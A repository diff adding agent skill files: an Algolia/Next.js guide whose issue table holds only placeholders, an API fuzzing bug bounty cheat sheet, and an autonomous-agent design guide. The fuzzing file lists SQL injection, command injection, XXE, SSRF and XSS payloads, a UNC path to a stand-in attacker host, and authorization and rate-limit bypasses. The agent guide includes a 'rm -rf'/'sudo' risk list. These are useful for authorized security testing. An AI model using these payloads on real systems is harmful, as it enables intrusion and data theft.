### Next.js Server-Side Rendering

SSR integration for Next.js with the react-instantsearch-nextjs package.

Use `<InstantSearchNext>` instead of `<InstantSearch>` for SSR.
Supports both Pages Router and App Router (experimental).

Key considerations:

- Set dynamic = 'force-dynamic' for fresh results
- Handle URL synchronization with the routing prop
- Use getServerState for initial state

### Data Synchronization and Indexing

Indexing strategies for keeping Algolia in sync with your data.

Three main approaches:

1. Full Reindexing - Replace entire index (expensive)
2. Full Record Updates - Replace individual records
3. Partial Updates - Update specific attributes only

Best practices:

- Batch records (ideal: 10MB, 1K-10K records per batch)
- Use incremental updates when possible
- partialUpdateObjects for attribute-only changes
- Avoid deleteBy (computationally expensive)

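The batching guidance above can be sketched as a plain chunking helper. This is a stdlib-only sketch: the actual upload of each batch (e.g. via the Algolia client's saveObjects or partialUpdateObjects) is left out, and the 1,000-record default follows the batch-size guidance above.

```python
def batch_records(records, max_records=1000):
    """Split records into Algolia-friendly batches by record count.

    A production version would also cap the serialized batch size
    (~10MB per the guidance above) before handing each batch to the
    Algolia client.
    """
    batch = []
    for rec in records:
        batch.append(rec)
        if len(batch) >= max_records:
            yield batch
            batch = []
    if batch:
        yield batch
```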
## ⚠️ Sharp Edges

| Issue | Severity | Solution |
|-------|----------|----------|
| Issue | critical | See docs |
| Issue | high | See docs |
| Issue | medium | See docs |
| Issue | medium | See docs |
| Issue | medium | See docs |
| Issue | medium | See docs |
| Issue | medium | See docs |
| Issue | medium | See docs |
430
skills/api-fuzzing-bug-bounty/SKILL.md
Normal file
@@ -0,0 +1,430 @@
---
name: API Fuzzing for Bug Bounty
description: This skill should be used when the user asks to "test API security", "fuzz APIs", "find IDOR vulnerabilities", "test REST API", "test GraphQL", "API penetration testing", "bug bounty API testing", or needs guidance on API security assessment techniques.
---

# API Fuzzing for Bug Bounty

## Purpose

Provide comprehensive techniques for testing REST, SOAP, and GraphQL APIs during bug bounty hunting and penetration testing engagements. Covers vulnerability discovery, authentication bypass, IDOR exploitation, and API-specific attack vectors.

## Inputs/Prerequisites

- Burp Suite or similar proxy tool
- API wordlists (SecLists, api_wordlist)
- Understanding of REST/GraphQL/SOAP protocols
- Python for scripting
- Target API endpoints and documentation (if available)

## Outputs/Deliverables

- Identified API vulnerabilities
- IDOR exploitation proofs
- Authentication bypass techniques
- SQL injection points
- Unauthorized data access documentation

---

## API Types Overview

| Type | Protocol | Data Format | Structure |
|------|----------|-------------|-----------|
| SOAP | HTTP | XML | Header + Body |
| REST | HTTP | JSON/XML/URL | Defined endpoints |
| GraphQL | HTTP | Custom Query | Single endpoint |

---

## Core Workflow

### Step 1: API Reconnaissance

Identify API type and enumerate endpoints:

```bash
# Check for Swagger/OpenAPI documentation
/swagger.json
/openapi.json
/api-docs
/v1/api-docs
/swagger-ui.html

# Use Kiterunner for API discovery
kr scan https://target.com -w routes-large.kite

# Extract paths from Swagger
python3 json2paths.py swagger.json
```

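The documentation probe above can be scripted. A minimal sketch that only builds the candidate URLs; fetching and probing them is left to your HTTP tool of choice, and the path list simply mirrors the one above.

```python
# Common API documentation paths (from the checklist above).
DOC_PATHS = [
    "/swagger.json", "/openapi.json", "/api-docs",
    "/v1/api-docs", "/swagger-ui.html",
]

def doc_candidates(base):
    """Build candidate documentation URLs for a target base URL."""
    base = base.rstrip("/")
    return [base + p for p in DOC_PATHS]
```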
### Step 2: Authentication Testing

```bash
# Test different login paths
/api/mobile/login
/api/v3/login
/api/magic_link
/api/admin/login

# Check rate limiting on auth endpoints
# If no rate limit → brute force possible

# Test mobile vs web API separately
# Don't assume same security controls
```

### Step 3: IDOR Testing

Insecure Direct Object Reference is the most common API vulnerability:

```bash
# Basic IDOR
GET /api/users/1234 → GET /api/users/1235

# Even if ID is email-based, try numeric
/?user_id=111 instead of /?user_id=user@mail.com

# Test /me/orders vs /user/654321/orders
```

**IDOR Bypass Techniques:**

```bash
# Wrap ID in array
{"id":111} → {"id":[111]}

# JSON wrap
{"id":111} → {"id":{"id":111}}

# Send ID twice
URL?id=<LEGIT>&id=<VICTIM>

# Wildcard injection
{"user_id":"*"}

# Parameter pollution
/api/get_profile?user_id=<victim>&user_id=<legit>
{"user_id":<legit_id>,"user_id":<victim_id>}
```

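The bypass variants above are mechanical enough to generate. A sketch that produces the JSON-body variants for a given key; the function name is an assumption, and note the duplicate-key pollution case must be built as a raw string because Python dicts deduplicate keys.

```python
import json

def idor_variants(key, legit_id, victim_id):
    """Generate JSON body variants for IDOR bypass testing."""
    return [
        json.dumps({key: victim_id}),          # baseline
        json.dumps({key: [victim_id]}),        # wrap ID in array
        json.dumps({key: {key: victim_id}}),   # JSON wrap
        json.dumps({key: "*"}),                # wildcard injection
        # Parameter pollution: dicts dedupe keys, so build raw JSON.
        f'{{"{key}":{json.dumps(legit_id)},"{key}":{json.dumps(victim_id)}}}',
    ]
```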
### Step 4: Injection Testing

**SQL Injection in JSON:**

```json
{"id":"56456"} → OK
{"id":"56456 AND 1=1#"} → OK
{"id":"56456 AND 1=2#"} → OK
{"id":"56456 AND 1=3#"} → ERROR (vulnerable!)
{"id":"56456 AND sleep(15)#"} → SLEEP 15 SEC
```

**Command Injection:**

```bash
# Ruby on Rails
?url=Kernel#open → ?url=|ls

# Linux command injection
api.url.com/endpoint?name=file.txt;ls%20/
```

**XXE Injection:**

```xml
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
```

**SSRF via API:**

```html
<object data="http://127.0.0.1:8443"/>
<img src="http://127.0.0.1:445"/>
```

**.NET Path.Combine Vulnerability:**

```bash
# If a .NET app uses Path.Combine(path_1, path_2)
# test for path traversal
https://example.org/download?filename=a.png
https://example.org/download?filename=C:\inetpub\wwwroot\web.config
https://example.org/download?filename=\\smb.dns.attacker.com\a.png
```

### Step 5: Method Testing

```bash
# Test all HTTP methods
GET /api/v1/users/1
POST /api/v1/users/1
PUT /api/v1/users/1
DELETE /api/v1/users/1
PATCH /api/v1/users/1

# Switch content type
Content-Type: application/json → application/xml
```

---

## GraphQL-Specific Testing

### Introspection Query

Fetch the entire backend schema:

```graphql
{__schema{queryType{name},mutationType{name},types{kind,name,description,fields(includeDeprecated:true){name,args{name,type{name,kind}}}}}}
```

**URL-encoded version:**

```
/graphql?query={__schema{types{name,kind,description,fields{name}}}}
```

### GraphQL IDOR

```graphql
# Try accessing other user IDs
query {
  user(id: "OTHER_USER_ID") {
    email
    password
    creditCard
  }
}
```

### GraphQL SQL/NoSQL Injection

```graphql
mutation {
  login(input: {
    email: "test' or 1=1--"
    password: "password"
  }) {
    success
    jwt
  }
}
```

### Rate Limit Bypass (Batching)

```graphql
mutation {login(input:{email:"a@example.com" password:"password"}){success jwt}}
mutation {login(input:{email:"b@example.com" password:"password"}){success jwt}}
mutation {login(input:{email:"c@example.com" password:"password"}){success jwt}}
```

### GraphQL DoS (Nested Queries)

```graphql
query {
  posts {
    comments {
      user {
        posts {
          comments {
            user {
              posts { ... }
            }
          }
        }
      }
    }
  }
}
```

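When assessing a target's resilience to the nested-query DoS above, it helps to know how depth limits are typically enforced. A rough brace-depth counter sketch; real servers analyze the parsed AST (e.g. via libraries like graphql-depth-limit) rather than counting characters, and this sketch ignores braces inside string literals.

```python
def max_depth(query):
    """Rough max nesting depth of a GraphQL query by brace counting."""
    depth = cur = 0
    for ch in query:
        if ch == "{":
            cur += 1
            depth = max(depth, cur)
        elif ch == "}":
            cur -= 1
    return depth

def reject_if_too_deep(query, limit=6):
    # A server enforcing a depth limit refuses deeply nested queries.
    if max_depth(query) > limit:
        raise ValueError("query too deep")
    return True
```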
### GraphQL XSS

```bash
# XSS via GraphQL endpoint
http://target.com/graphql?query={user(name:"<script>alert(1)</script>"){id}}

# URL-encoded XSS
http://target.com/example?id=%3C/script%3E%3Cscript%3Ealert('XSS')%3C/script%3E
```

### GraphQL Tools

| Tool | Purpose |
|------|---------|
| GraphCrawler | Schema discovery |
| graphw00f | Fingerprinting |
| clairvoyance | Schema reconstruction |
| InQL | Burp extension |
| GraphQLmap | Exploitation |

---

## Endpoint Bypass Techniques

When receiving 403/401, try these bypasses:

```bash
# Original blocked request
/api/v1/users/sensitivedata → 403

# Bypass attempts
/api/v1/users/sensitivedata.json
/api/v1/users/sensitivedata?
/api/v1/users/sensitivedata/
/api/v1/users/sensitivedata??
/api/v1/users/sensitivedata%20
/api/v1/users/sensitivedata%09
/api/v1/users/sensitivedata#
/api/v1/users/sensitivedata&details
/api/v1/users/..;/sensitivedata
```

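These bypass attempts can be generated rather than typed by hand. A sketch that produces the same variants as the list above for any blocked path; the function name is an assumption.

```python
# Suffix variants from the bypass list above.
SUFFIXES = [".json", "?", "/", "??", "%20", "%09", "#", "&details"]

def bypass_variants(path):
    """Generate 403/401 bypass candidates for a blocked API path."""
    variants = [path + s for s in SUFFIXES]
    # Path-confusion variant: inject ..;/ before the last segment.
    head, _, tail = path.rpartition("/")
    if head:
        variants.append(f"{head}/..;/{tail}")
    return variants
```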
---

## Output Exploitation

### PDF Export Attacks

```html
<!-- LFI via PDF export -->
<iframe src="file:///etc/passwd" height=1000 width=800>

<!-- SSRF via PDF export -->
<object data="http://127.0.0.1:8443"/>

<!-- Port scanning -->
<img src="http://127.0.0.1:445"/>

<!-- IP disclosure -->
<img src="https://iplogger.com/yourcode.gif"/>
```

### DoS via Limits

```bash
# Normal request
/api/news?limit=100

# DoS attempt
/api/news?limit=9999999999
```

---

## Common API Vulnerabilities Checklist

| Vulnerability | Description |
|---------------|-------------|
| API Exposure | Unprotected endpoints exposed publicly |
| Misconfigured Caching | Sensitive data cached incorrectly |
| Exposed Tokens | API keys/tokens in responses or URLs |
| JWT Weaknesses | Weak signing, no expiration, algorithm confusion |
| IDOR / BOLA | Broken Object Level Authorization |
| Undocumented Endpoints | Hidden admin/debug endpoints |
| Different Versions | Security gaps in older API versions |
| Rate Limiting | Missing or bypassable rate limits |
| Race Conditions | TOCTOU vulnerabilities |
| XXE Injection | XML parser exploitation |
| Content Type Issues | Switching between JSON/XML |
| HTTP Method Tampering | GET→DELETE/PUT abuse |

---

## Quick Reference

| Vulnerability | Test Payload | Risk |
|---------------|--------------|------|
| IDOR | Change user_id parameter | High |
| SQLi | `' OR 1=1--` in JSON | Critical |
| Command Injection | `; ls /` | Critical |
| XXE | DOCTYPE with ENTITY | High |
| SSRF | Internal IP in params | High |
| Rate Limit Bypass | Batch requests | Medium |
| Method Tampering | GET→DELETE | High |

---

## Tools Reference

| Category | Tool | URL |
|----------|------|-----|
| API Fuzzing | Fuzzapi | github.com/Fuzzapi/fuzzapi |
| API Fuzzing | API-fuzzer | github.com/Fuzzapi/API-fuzzer |
| API Fuzzing | Astra | github.com/flipkart-incubator/Astra |
| API Security | apicheck | github.com/BBVA/apicheck |
| API Discovery | Kiterunner | github.com/assetnote/kiterunner |
| API Discovery | openapi_security_scanner | github.com/ngalongc/openapi_security_scanner |
| API Toolkit | APIKit | github.com/API-Security/APIKit |
| API Keys | API Guesser | api-guesser.netlify.app |
| GUID | GUID Guesser | gist.github.com/DanaEpp/8c6803e542f094da5c4079622f9b4d18 |
| GraphQL | InQL | github.com/doyensec/inql |
| GraphQL | GraphCrawler | github.com/gsmith257-cyber/GraphCrawler |
| GraphQL | graphw00f | github.com/dolevf/graphw00f |
| GraphQL | clairvoyance | github.com/nikitastupin/clairvoyance |
| GraphQL | batchql | github.com/assetnote/batchql |
| GraphQL | graphql-cop | github.com/dolevf/graphql-cop |
| Wordlists | SecLists | github.com/danielmiessler/SecLists |
| Swagger Parser | Swagger-EZ | rhinosecuritylabs.github.io/Swagger-EZ |
| Swagger Routes | swagroutes | github.com/amalmurali47/swagroutes |
| API Mindmap | MindAPI | dsopas.github.io/MindAPI/play |
| JSON Paths | json2paths | github.com/s0md3v/dump/tree/master/json2paths |

---

## Constraints

**Must:**

- Test mobile, web, and developer APIs separately
- Check all API versions (/v1, /v2, /v3)
- Validate both authenticated and unauthenticated access

**Must Not:**

- Assume same security controls across API versions
- Skip testing undocumented endpoints
- Ignore rate limiting checks

**Should:**

- Add `X-Requested-With: XMLHttpRequest` header to simulate frontend
- Check archive.org for historical API endpoints
- Test for race conditions on sensitive operations

---

## Examples

### Example 1: IDOR Exploitation

```bash
# Original request (own data)
GET /api/v1/invoices/12345
Authorization: Bearer <token>

# Modified request (other user's data)
GET /api/v1/invoices/12346
Authorization: Bearer <token>

# Response reveals other user's invoice data
```

### Example 2: GraphQL Introspection

```bash
curl -X POST https://target.com/graphql \
  -H "Content-Type: application/json" \
  -d '{"query":"{__schema{types{name,fields{name}}}}"}'
```

---

## Troubleshooting

| Issue | Solution |
|-------|----------|
| API returns nothing | Add `X-Requested-With: XMLHttpRequest` header |
| 401 on all endpoints | Try adding `?user_id=1` parameter |
| GraphQL introspection disabled | Use clairvoyance for schema reconstruction |
| Rate limited | Use IP rotation or batch requests |
| Can't find endpoints | Check Swagger, archive.org, JS files |
761
skills/autonomous-agent-patterns/SKILL.md
Normal file
@@ -0,0 +1,761 @@
---
name: autonomous-agent-patterns
description: "Design patterns for building autonomous coding agents. Covers tool integration, permission systems, browser automation, and human-in-the-loop workflows. Use when building AI agents, designing tool APIs, implementing permission systems, or creating autonomous coding assistants."
---

# 🕹️ Autonomous Agent Patterns

> Design patterns for building autonomous coding agents, inspired by [Cline](https://github.com/cline/cline) and [OpenAI Codex](https://github.com/openai/codex).

## When to Use This Skill

Use this skill when:

- Building autonomous AI agents
- Designing tool/function calling APIs
- Implementing permission and approval systems
- Creating browser automation for agents
- Designing human-in-the-loop workflows

---

## 1. Core Agent Architecture

### 1.1 Agent Loop

```
┌─────────────────────────────────────────────────────┐
│                     AGENT LOOP                      │
│                                                     │
│   ┌──────────┐    ┌──────────┐    ┌──────────┐      │
│   │  Think   │───▶│  Decide  │───▶│   Act    │      │
│   │ (Reason) │    │  (Plan)  │    │ (Execute)│      │
│   └──────────┘    └──────────┘    └──────────┘      │
│        ▲                               │            │
│        │          ┌──────────┐         │            │
│        └──────────│ Observe  │◀────────┘            │
│                   │ (Result) │                      │
│                   └──────────┘                      │
└─────────────────────────────────────────────────────┘
```

```python
import json
from typing import Any

class AgentLoop:
    def __init__(self, llm, tools, max_iterations=50):
        self.llm = llm
        self.tools = {t.name: t for t in tools}
        self.max_iterations = max_iterations
        self.history = []

    def run(self, task: str) -> str:
        self.history.append({"role": "user", "content": task})

        for i in range(self.max_iterations):
            # Think: Get LLM response with tool options
            response = self.llm.chat(
                messages=self.history,
                tools=self._format_tools(),
                tool_choice="auto"
            )

            # Decide: Check if agent wants to use a tool
            if response.tool_calls:
                for tool_call in response.tool_calls:
                    # Act: Execute the tool
                    result = self._execute_tool(tool_call)

                    # Observe: Add result to history
                    self.history.append({
                        "role": "tool",
                        "tool_call_id": tool_call.id,
                        "content": str(result)
                    })
            else:
                # No more tool calls = task complete
                return response.content

        return "Max iterations reached"

    def _execute_tool(self, tool_call) -> Any:
        tool = self.tools[tool_call.name]
        args = json.loads(tool_call.arguments)
        return tool.execute(**args)
```

### 1.2 Multi-Model Architecture

```python
class MultiModelAgent:
    """
    Use different models for different purposes:
    - Fast model for planning
    - Powerful model for complex reasoning
    - Specialized model for code generation
    """

    def __init__(self):
        self.models = {
            "fast": "gpt-3.5-turbo",    # Quick decisions
            "smart": "gpt-4-turbo",     # Complex reasoning
            "code": "claude-3-sonnet",  # Code generation
        }

    def select_model(self, task_type: str) -> str:
        if task_type == "planning":
            return self.models["fast"]
        elif task_type == "analysis":
            return self.models["smart"]
        elif task_type == "code":
            return self.models["code"]
        return self.models["smart"]
```

---

## 2. Tool Design Patterns

### 2.1 Tool Schema

```python
from dataclasses import dataclass

@dataclass
class ToolResult:
    # Minimal result container (assumed; not defined in the original excerpt)
    success: bool
    output: str = ""
    error: str = ""

class Tool:
    """Base class for agent tools"""

    @property
    def schema(self) -> dict:
        """JSON Schema for the tool"""
        return {
            "name": self.name,
            "description": self.description,
            "parameters": {
                "type": "object",
                "properties": self._get_parameters(),
                "required": self._get_required()
            }
        }

    def execute(self, **kwargs) -> ToolResult:
        """Execute the tool and return result"""
        raise NotImplementedError

class ReadFileTool(Tool):
    name = "read_file"
    description = "Read the contents of a file from the filesystem"

    def _get_parameters(self):
        return {
            "path": {
                "type": "string",
                "description": "Absolute path to the file"
            },
            "start_line": {
                "type": "integer",
                "description": "Line to start reading from (1-indexed)"
            },
            "end_line": {
                "type": "integer",
                "description": "Line to stop reading at (inclusive)"
            }
        }

    def _get_required(self):
        return ["path"]

    def execute(self, path: str, start_line: int = None, end_line: int = None) -> ToolResult:
        try:
            with open(path, 'r') as f:
                lines = f.readlines()

            if start_line and end_line:
                lines = lines[start_line-1:end_line]

            return ToolResult(
                success=True,
                output="".join(lines)
            )
        except FileNotFoundError:
            return ToolResult(
                success=False,
                error=f"File not found: {path}"
            )
```

### 2.2 Essential Agent Tools
|
||||
|
||||
```python
|
||||
CODING_AGENT_TOOLS = {
|
||||
# File operations
|
||||
"read_file": "Read file contents",
|
||||
"write_file": "Create or overwrite a file",
|
||||
"edit_file": "Make targeted edits to a file",
|
||||
"list_directory": "List files and folders",
|
||||
"search_files": "Search for files by pattern",
|
||||
|
||||
# Code understanding
|
||||
"search_code": "Search for code patterns (grep)",
|
||||
"get_definition": "Find function/class definition",
|
||||
"get_references": "Find all references to a symbol",
|
||||
|
||||
# Terminal
|
||||
"run_command": "Execute a shell command",
|
||||
"read_output": "Read command output",
|
||||
"send_input": "Send input to running command",
|
||||
|
||||
# Browser (optional)
|
||||
"open_browser": "Open URL in browser",
|
||||
"click_element": "Click on page element",
|
||||
"type_text": "Type text into input",
|
||||
"screenshot": "Capture screenshot",
|
||||
|
||||
# Context
|
||||
"ask_user": "Ask the user a question",
|
||||
"search_web": "Search the web for information"
|
||||
}
|
||||
```
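
One way to wire such a catalog to concrete `Tool` subclasses is a small registry that exposes schemas for the LLM call and dispatches executions by name. This is a sketch under assumed names: `ToolRegistry` and `EchoTool` are illustrative, not part of any framework, and `ToolResult` is re-declared here so the block stands alone.

```python
from dataclasses import dataclass

@dataclass
class ToolResult:
    success: bool
    output: str = ""
    error: str = None

class EchoTool:
    """Stand-in for a real Tool subclass like ReadFileTool."""
    name = "echo"
    description = "Echo back the given text"

    def schema(self):
        return {"name": self.name, "description": self.description}

    def execute(self, text: str) -> ToolResult:
        return ToolResult(success=True, output=text)

class ToolRegistry:
    def __init__(self):
        self._tools = {}

    def register(self, tool):
        self._tools[tool.name] = tool

    def schemas(self):
        # The list handed to the LLM's tool-use API on each request
        return [t.schema() for t in self._tools.values()]

    def dispatch(self, name, **kwargs) -> ToolResult:
        if name not in self._tools:
            return ToolResult(success=False, error=f"Unknown tool: {name}")
        return self._tools[name].execute(**kwargs)

registry = ToolRegistry()
registry.register(EchoTool())
print(registry.dispatch("echo", text="hello").output)  # hello
```

Returning a failed `ToolResult` for unknown tool names, rather than raising, keeps the agent loop alive so the model can see the error and retry.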

### 2.3 Edit Tool Design

```python
class EditFileTool(Tool):
    """
    Precise file editing with conflict detection.
    Uses search/replace pattern for reliable edits.
    """

    name = "edit_file"
    description = "Edit a file by replacing specific content"

    def execute(
        self,
        path: str,
        search: str,
        replace: str,
        expected_occurrences: int = 1
    ) -> ToolResult:
        """
        Args:
            path: File to edit
            search: Exact text to find (must match exactly, including whitespace)
            replace: Text to replace with
            expected_occurrences: How many times search should appear (validation)
        """
        with open(path, 'r') as f:
            content = f.read()

        # Validate: check the not-found case first so its error is reachable,
        # then the count mismatch
        actual_occurrences = content.count(search)
        if actual_occurrences == 0:
            return ToolResult(
                success=False,
                error="Search text not found in file"
            )

        if actual_occurrences != expected_occurrences:
            return ToolResult(
                success=False,
                error=f"Expected {expected_occurrences} occurrences, found {actual_occurrences}"
            )

        # Apply edit
        new_content = content.replace(search, replace)

        with open(path, 'w') as f:
            f.write(new_content)

        return ToolResult(
            success=True,
            output=f"Replaced {actual_occurrences} occurrence(s)"
        )
```

---

## 3. Permission & Safety Patterns

### 3.1 Permission Levels

```python
from enum import Enum

class PermissionLevel(Enum):
    # Fully automatic - no user approval needed
    AUTO = "auto"

    # Ask once per session
    ASK_ONCE = "ask_once"

    # Ask every time
    ASK_EACH = "ask_each"

    # Never allow
    NEVER = "never"

PERMISSION_CONFIG = {
    # Low risk - can auto-approve
    "read_file": PermissionLevel.AUTO,
    "list_directory": PermissionLevel.AUTO,
    "search_code": PermissionLevel.AUTO,

    # Medium risk - ask once
    "write_file": PermissionLevel.ASK_ONCE,
    "edit_file": PermissionLevel.ASK_ONCE,

    # High risk - ask each time
    "run_command": PermissionLevel.ASK_EACH,
    "delete_file": PermissionLevel.ASK_EACH,

    # Dangerous - never auto-approve
    "sudo_command": PermissionLevel.NEVER,
    "format_disk": PermissionLevel.NEVER
}
```

### 3.2 Approval UI Pattern

```python
class ApprovalManager:
    def __init__(self, ui, config):
        self.ui = ui
        self.config = config
        self.session_approvals = {}

    def request_approval(self, tool_name: str, args: dict) -> bool:
        level = self.config.get(tool_name, PermissionLevel.ASK_EACH)

        if level == PermissionLevel.AUTO:
            return True

        if level == PermissionLevel.NEVER:
            self.ui.show_error(f"Tool '{tool_name}' is not allowed")
            return False

        if level == PermissionLevel.ASK_ONCE:
            if tool_name in self.session_approvals:
                return self.session_approvals[tool_name]

        # Show approval dialog
        approved = self.ui.show_approval_dialog(
            tool=tool_name,
            args=args,
            risk_level=self._assess_risk(tool_name, args)
        )

        if level == PermissionLevel.ASK_ONCE:
            self.session_approvals[tool_name] = approved

        return approved

    def _assess_risk(self, tool_name: str, args: dict) -> str:
        """Analyze specific call for risk level"""
        if tool_name == "run_command":
            cmd = args.get("command", "")
            if any(danger in cmd for danger in ["rm -rf", "sudo", "chmod"]):
                return "HIGH"
        return "MEDIUM"
```

### 3.3 Sandboxing

```python
import os
import shlex
import subprocess

class SandboxedExecution:
    """
    Execute code/commands in isolated environment
    """

    def __init__(self, workspace_dir: str):
        self.workspace = workspace_dir
        self.allowed_commands = ["npm", "python", "node", "git", "ls", "cat"]
        self.blocked_paths = ["/etc", "/usr", "/bin", os.path.expanduser("~")]

    def validate_path(self, path: str) -> bool:
        """Ensure path is within workspace"""
        real_path = os.path.realpath(path)
        workspace_real = os.path.realpath(self.workspace)
        # Require an exact match or a separator boundary so that
        # e.g. /workspace2 is not treated as inside /workspace
        return real_path == workspace_real or real_path.startswith(workspace_real + os.sep)

    def validate_command(self, command: str) -> bool:
        """Check if command is allowed"""
        cmd_parts = shlex.split(command)
        if not cmd_parts:
            return False

        base_cmd = cmd_parts[0]
        return base_cmd in self.allowed_commands

    def execute_sandboxed(self, command: str) -> ToolResult:
        if not self.validate_command(command):
            return ToolResult(
                success=False,
                error=f"Command not allowed: {command}"
            )

        # Execute in isolated environment
        result = subprocess.run(
            command,
            shell=True,
            cwd=self.workspace,
            capture_output=True,
            timeout=30,
            env={
                **os.environ,
                "HOME": self.workspace,  # Isolate home directory
            }
        )

        return ToolResult(
            success=result.returncode == 0,
            output=result.stdout.decode(),
            error=result.stderr.decode() if result.returncode != 0 else None
        )
```
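
A bare `startswith` check for workspace containment is easy to get wrong, because a sibling directory like `/workspace2` shares the string prefix of `/workspace`. A standalone sketch of the separator-boundary guard (`inside` is a hypothetical helper mirroring `validate_path` above):

```python
import os
import tempfile

def inside(workspace: str, path: str) -> bool:
    ws = os.path.realpath(workspace)
    p = os.path.realpath(path)
    # Exact match, or the prefix followed by a path separator
    return p == ws or p.startswith(ws + os.sep)

ws = tempfile.mkdtemp()
print(inside(ws, os.path.join(ws, "src", "main.py")))  # True
print(inside(ws, ws + "2"))                            # False: sibling directory
print(inside(ws, os.path.join(ws, "..")))              # False: traversal
```

`os.path.realpath` also resolves symlinks, which closes the escape route of symlinking a workspace file to somewhere outside it.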

---

## 4. Browser Automation

### 4.1 Browser Tool Pattern

```python
class BrowserTool:
    """
    Browser automation for agents using Playwright/Puppeteer.
    Enables visual debugging and web testing.
    """

    def __init__(self, headless: bool = True):
        self.browser = None
        self.page = None
        self.headless = headless

    async def open_url(self, url: str) -> ToolResult:
        """Navigate to URL and return page info"""
        if not self.browser:
            self.browser = await playwright.chromium.launch(headless=self.headless)
            self.page = await self.browser.new_page()

        await self.page.goto(url)

        # Capture state
        screenshot = await self.page.screenshot(type='png')
        title = await self.page.title()

        return ToolResult(
            success=True,
            output=f"Loaded: {title}",
            metadata={
                "screenshot": base64.b64encode(screenshot).decode(),
                "url": self.page.url
            }
        )

    async def click(self, selector: str) -> ToolResult:
        """Click on an element"""
        try:
            await self.page.click(selector, timeout=5000)
            await self.page.wait_for_load_state("networkidle")

            screenshot = await self.page.screenshot()
            return ToolResult(
                success=True,
                output=f"Clicked: {selector}",
                metadata={"screenshot": base64.b64encode(screenshot).decode()}
            )
        except TimeoutError:
            return ToolResult(
                success=False,
                error=f"Element not found: {selector}"
            )

    async def type_text(self, selector: str, text: str) -> ToolResult:
        """Type text into an input"""
        await self.page.fill(selector, text)
        return ToolResult(success=True, output=f"Typed into {selector}")

    async def get_page_content(self) -> ToolResult:
        """Get accessible text content of the page"""
        content = await self.page.evaluate("""
            () => {
                // Get visible text
                const walker = document.createTreeWalker(
                    document.body,
                    NodeFilter.SHOW_TEXT,
                    null,
                    false
                );

                let text = '';
                while (walker.nextNode()) {
                    const node = walker.currentNode;
                    if (node.textContent.trim()) {
                        text += node.textContent.trim() + '\\n';
                    }
                }
                return text;
            }
        """)
        return ToolResult(success=True, output=content)
```

### 4.2 Visual Agent Pattern

```python
class VisualAgent:
    """
    Agent that uses screenshots to understand web pages.
    Can identify elements visually without selectors.
    """

    def __init__(self, llm, browser):
        self.llm = llm
        self.browser = browser

    async def describe_page(self) -> str:
        """Use vision model to describe current page"""
        screenshot = await self.browser.screenshot()

        response = self.llm.chat([
            {
                "role": "user",
                "content": [
                    {"type": "text", "text": "Describe this webpage. List all interactive elements you see."},
                    {"type": "image", "data": screenshot}
                ]
            }
        ])

        return response.content

    async def find_and_click(self, description: str) -> ToolResult:
        """Find element by visual description and click it"""
        screenshot = await self.browser.screenshot()

        # Ask vision model to find element
        response = self.llm.chat([
            {
                "role": "user",
                "content": [
                    {
                        "type": "text",
                        "text": f"""
                        Find the element matching: "{description}"
                        Return the approximate coordinates as JSON: {{"x": number, "y": number}}
                        """
                    },
                    {"type": "image", "data": screenshot}
                ]
            }
        ])

        coords = json.loads(response.content)
        await self.browser.page.mouse.click(coords["x"], coords["y"])

        return ToolResult(success=True, output=f"Clicked at ({coords['x']}, {coords['y']})")
```

---

## 5. Context Management

### 5.1 Context Injection Patterns

````python
class ContextManager:
    """
    Manage context provided to the agent.
    Inspired by Cline's @-mention patterns.
    """

    def __init__(self, workspace: str):
        self.workspace = workspace
        self.context = []

    def add_file(self, path: str) -> None:
        """@file - Add file contents to context"""
        with open(path, 'r') as f:
            content = f.read()

        self.context.append({
            "type": "file",
            "path": path,
            "content": content
        })

    def add_folder(self, path: str, max_files: int = 20) -> None:
        """@folder - Add all files in folder"""
        for root, dirs, files in os.walk(path):
            for file in files[:max_files]:
                file_path = os.path.join(root, file)
                self.add_file(file_path)

    def add_url(self, url: str) -> None:
        """@url - Fetch and add URL content"""
        response = requests.get(url)
        content = html_to_markdown(response.text)

        self.context.append({
            "type": "url",
            "url": url,
            "content": content
        })

    def add_problems(self, diagnostics: list) -> None:
        """@problems - Add IDE diagnostics"""
        self.context.append({
            "type": "diagnostics",
            "problems": diagnostics
        })

    def format_for_prompt(self) -> str:
        """Format all context for LLM prompt"""
        parts = []
        for item in self.context:
            if item["type"] == "file":
                parts.append(f"## File: {item['path']}\n```\n{item['content']}\n```")
            elif item["type"] == "url":
                parts.append(f"## URL: {item['url']}\n{item['content']}")
            elif item["type"] == "diagnostics":
                parts.append(f"## Problems:\n{json.dumps(item['problems'], indent=2)}")

        return "\n\n".join(parts)
````

### 5.2 Checkpoint/Resume

```python
class CheckpointManager:
    """
    Save and restore agent state for long-running tasks.
    """

    def __init__(self, storage_dir: str):
        self.storage_dir = storage_dir
        os.makedirs(storage_dir, exist_ok=True)

    def save_checkpoint(self, session_id: str, state: dict) -> str:
        """Save current agent state"""
        checkpoint = {
            "timestamp": datetime.now().isoformat(),
            "session_id": session_id,
            "history": state["history"],
            "context": state["context"],
            "workspace_state": self._capture_workspace(state["workspace"]),
            "metadata": state.get("metadata", {})
        }

        path = os.path.join(self.storage_dir, f"{session_id}.json")
        with open(path, 'w') as f:
            json.dump(checkpoint, f, indent=2)

        return path

    def restore_checkpoint(self, checkpoint_path: str) -> dict:
        """Restore agent state from checkpoint"""
        with open(checkpoint_path, 'r') as f:
            checkpoint = json.load(f)

        return {
            "history": checkpoint["history"],
            "context": checkpoint["context"],
            "workspace": self._restore_workspace(checkpoint["workspace_state"]),
            "metadata": checkpoint["metadata"]
        }

    def _capture_workspace(self, workspace: str) -> dict:
        """Capture relevant workspace state"""
        # Git status, file hashes, etc.
        return {
            "git_ref": subprocess.getoutput(f"cd {workspace} && git rev-parse HEAD"),
            "git_dirty": subprocess.getoutput(f"cd {workspace} && git status --porcelain")
        }
```

---

## 6. MCP (Model Context Protocol) Integration

### 6.1 MCP Server Pattern

```python
from mcp import Server, Tool

class MCPAgent:
    """
    Agent that can dynamically discover and use MCP tools.
    'Add a tool that...' pattern from Cline.
    """

    def __init__(self, llm):
        self.llm = llm
        self.mcp_servers = {}
        self.available_tools = {}

    def connect_server(self, name: str, config: dict) -> None:
        """Connect to an MCP server"""
        server = Server(config)
        self.mcp_servers[name] = server

        # Discover tools
        tools = server.list_tools()
        for tool in tools:
            self.available_tools[tool.name] = {
                "server": name,
                "schema": tool.schema
            }

    async def create_tool(self, description: str) -> str:
        """
        Create a new MCP server based on user description.
        'Add a tool that fetches Jira tickets'
        """
        # Generate MCP server code
        code = self.llm.generate(f"""
